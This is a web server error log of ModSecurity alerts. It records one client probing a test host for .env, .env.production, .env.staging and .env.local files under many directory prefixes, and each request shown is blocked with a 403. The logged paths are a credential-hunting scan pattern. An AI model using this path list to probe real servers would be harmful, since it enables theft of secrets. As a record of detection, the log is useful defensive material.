[Thu Jan 08 21:18:38.621451 2026] [:error] [pid 1270037] [client 18.119.100.98:42282] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/service/.env.production"] [unique_id "aWARHuA_IfWyU2EIiRhOlAAAAAI"]
[Thu Jan 08 21:18:38.621674 2026] [:error] [pid 1270037] [client 18.119.100.98:42282] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/service/.env.production"] [unique_id "aWARHuA_IfWyU2EIiRhOlAAAAAI"]
[Thu Jan 08 21:18:38.968277 2026] [:error] [pid 1280390] [client 18.119.100.98:42420] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /portal/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/portal/.env"] [unique_id "aWARHtKTJIy7S9W5nL2LTwAAAAk"]
[Thu Jan 08 21:18:38.968485 2026] [:error] [pid 1280390] [client 18.119.100.98:42420] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/portal/.env"] [unique_id "aWARHtKTJIy7S9W5nL2LTwAAAAk"]
[Thu Jan 08 21:18:38.968644 2026] [:error] [pid 1280390] [client 18.119.100.98:42420] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/portal/.env"] [unique_id "aWARHtKTJIy7S9W5nL2LTwAAAAk"]
[Thu Jan 08 21:18:39.316810 2026] [:error] [pid 1270038] [client 18.119.100.98:42540] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env.local"] [unique_id "aWARHxmwMJtANIcuNUXpNAAAAAM"]
[Thu Jan 08 21:18:39.317032 2026] [:error] [pid 1270038] [client 18.119.100.98:42540] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env.local"] [unique_id "aWARHxmwMJtANIcuNUXpNAAAAAM"]
[Thu Jan 08 21:18:39.317192 2026] [:error] [pid 1270038] [client 18.119.100.98:42540] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env.local"] [unique_id "aWARHxmwMJtANIcuNUXpNAAAAAM"]
[Thu Jan 08 21:18:39.662877 2026] [:error] [pid 1270039] [client 18.119.100.98:42674] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /xampp/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/xampp/.env.staging"] [unique_id "aWARH5ccQYhM1DUhi_W7GQAAAAQ"]
[Thu Jan 08 21:18:39.663082 2026] [:error] [pid 1270039] [client 18.119.100.98:42674] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/xampp/.env.staging"] [unique_id "aWARH5ccQYhM1DUhi_W7GQAAAAQ"]
[Thu Jan 08 21:18:39.663236 2026] [:error] [pid 1270039] [client 18.119.100.98:42674] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/xampp/.env.staging"] [unique_id "aWARH5ccQYhM1DUhi_W7GQAAAAQ"]
[Thu Jan 08 21:18:40.010223 2026] [:error] [pid 1270043] [client 18.119.100.98:42792] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /lms/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/lms/.env"] [unique_id "aWARIAvEr1EpOYnVfM6r1AAAAAc"]
[Thu Jan 08 21:18:40.010453 2026] [:error] [pid 1270043] [client 18.119.100.98:42792] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/lms/.env"] [unique_id "aWARIAvEr1EpOYnVfM6r1AAAAAc"]
[Thu Jan 08 21:18:40.010603 2026] [:error] [pid 1270043] [client 18.119.100.98:42792] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/lms/.env"] [unique_id "aWARIAvEr1EpOYnVfM6r1AAAAAc"]
[Thu Jan 08 21:18:40.362216 2026] [:error] [pid 1270035] [client 18.119.100.98:42924] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env.production"] [unique_id "aWARICYqm_i2BUcmtQb4yQAAAAA"]
[Thu Jan 08 21:18:40.362450 2026] [:error] [pid 1270035] [client 18.119.100.98:42924] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env.production"] [unique_id "aWARICYqm_i2BUcmtQb4yQAAAAA"]
[Thu Jan 08 21:18:40.362609 2026] [:error] [pid 1270035] [client 18.119.100.98:42924] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env.production"] [unique_id "aWARICYqm_i2BUcmtQb4yQAAAAA"]
[Thu Jan 08 21:18:40.730235 2026] [:error] [pid 1270041] [client 18.119.100.98:43056] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /kyc/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/kyc/.env.staging"] [unique_id "aWARIM3GwEx_BV8-CrWUVQAAAAU"]
[Thu Jan 08 21:18:40.730501 2026] [:error] [pid 1270041] [client 18.119.100.98:43056] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/kyc/.env.staging"] [unique_id "aWARIM3GwEx_BV8-CrWUVQAAAAU"]
[Thu Jan 08 21:18:40.730664 2026] [:error] [pid 1270041] [client 18.119.100.98:43056] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/kyc/.env.staging"] [unique_id "aWARIM3GwEx_BV8-CrWUVQAAAAU"]
[Thu Jan 08 21:18:41.081406 2026] [:error] [pid 1283304] [client 18.119.100.98:43186] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /marketing/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/marketing/.env.local"] [unique_id "aWARIWAwUIZgFNkik8yVTAAAAAg"]
[Thu Jan 08 21:18:41.081615 2026] [:error] [pid 1283304] [client 18.119.100.98:43186] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/marketing/.env.local"] [unique_id "aWARIWAwUIZgFNkik8yVTAAAAAg"]
[Thu Jan 08 21:18:41.081774 2026] [:error] [pid 1283304] [client 18.119.100.98:43186] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/marketing/.env.local"] [unique_id "aWARIWAwUIZgFNkik8yVTAAAAAg"]
[Thu Jan 08 21:18:41.427831 2026] [:error] [pid 1270042] [client 18.119.100.98:43312] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /development/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/development/.env.staging"] [unique_id "aWARIS7RlX2cRjHcFz6x0QAAAAY"]
[Thu Jan 08 21:18:41.428042 2026] [:error] [pid 1270042] [client 18.119.100.98:43312] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/development/.env.staging"] [unique_id "aWARIS7RlX2cRjHcFz6x0QAAAAY"]
[Thu Jan 08 21:18:41.428202 2026] [:error] [pid 1270042] [client 18.119.100.98:43312] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/development/.env.staging"] [unique_id "aWARIS7RlX2cRjHcFz6x0QAAAAY"]
[Thu Jan 08 21:18:41.771557 2026] [:error] [pid 1270036] [client 18.119.100.98:43434] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /new/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env"] [unique_id "aWARIeM1154Q6b0hewij9QAAAAE"]
[Thu Jan 08 21:18:41.771765 2026] [:error] [pid 1270036] [client 18.119.100.98:43434] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env"] [unique_id "aWARIeM1154Q6b0hewij9QAAAAE"]
[Thu Jan 08 21:18:41.771916 2026] [:error] [pid 1270036] [client 18.119.100.98:43434] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env"] [unique_id "aWARIeM1154Q6b0hewij9QAAAAE"]
[Thu Jan 08 21:18:42.120371 2026] [:error] [pid 1270037] [client 18.119.100.98:43556] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /xampp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/xampp/.env"] [unique_id "aWARIuA_IfWyU2EIiRhOlQAAAAI"]
[Thu Jan 08 21:18:42.120582 2026] [:error] [pid 1270037] [client 18.119.100.98:43556] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/xampp/.env"] [unique_id "aWARIuA_IfWyU2EIiRhOlQAAAAI"]
[Thu Jan 08 21:18:42.120762 2026] [:error] [pid 1270037] [client 18.119.100.98:43556] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/xampp/.env"] [unique_id "aWARIuA_IfWyU2EIiRhOlQAAAAI"]
[Thu Jan 08 21:18:42.465287 2026] [:error] [pid 1280390] [client 18.119.100.98:43672] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /kyc/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/kyc/.env.production"] [unique_id "aWARItKTJIy7S9W5nL2LUAAAAAk"]
[Thu Jan 08 21:18:42.465500 2026] [:error] [pid 1280390] [client 18.119.100.98:43672] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/kyc/.env.production"] [unique_id "aWARItKTJIy7S9W5nL2LUAAAAAk"]
[Thu Jan 08 21:18:42.465650 2026] [:error] [pid 1280390] [client 18.119.100.98:43672] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/kyc/.env.production"] [unique_id "aWARItKTJIy7S9W5nL2LUAAAAAk"]
[Thu Jan 08 21:18:42.807006 2026] [:error] [pid 1270038] [client 18.119.100.98:43792] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /services/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/services/.env.staging"] [unique_id "aWARIhmwMJtANIcuNUXpNQAAAAM"]
[Thu Jan 08 21:18:42.807215 2026] [:error] [pid 1270038] [client 18.119.100.98:43792] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/services/.env.staging"] [unique_id "aWARIhmwMJtANIcuNUXpNQAAAAM"]
[Thu Jan 08 21:18:42.807385 2026] [:error] [pid 1270038] [client 18.119.100.98:43792] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/services/.env.staging"] [unique_id "aWARIhmwMJtANIcuNUXpNQAAAAM"]
[Thu Jan 08 21:18:43.154054 2026] [:error] [pid 1270039] [client 18.119.100.98:43926] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /client/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/client/.env.staging"] [unique_id "aWARI5ccQYhM1DUhi_W7GgAAAAQ"]
[Thu Jan 08 21:18:43.154282 2026] [:error] [pid 1270039] [client 18.119.100.98:43926] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/client/.env.staging"] [unique_id "aWARI5ccQYhM1DUhi_W7GgAAAAQ"]
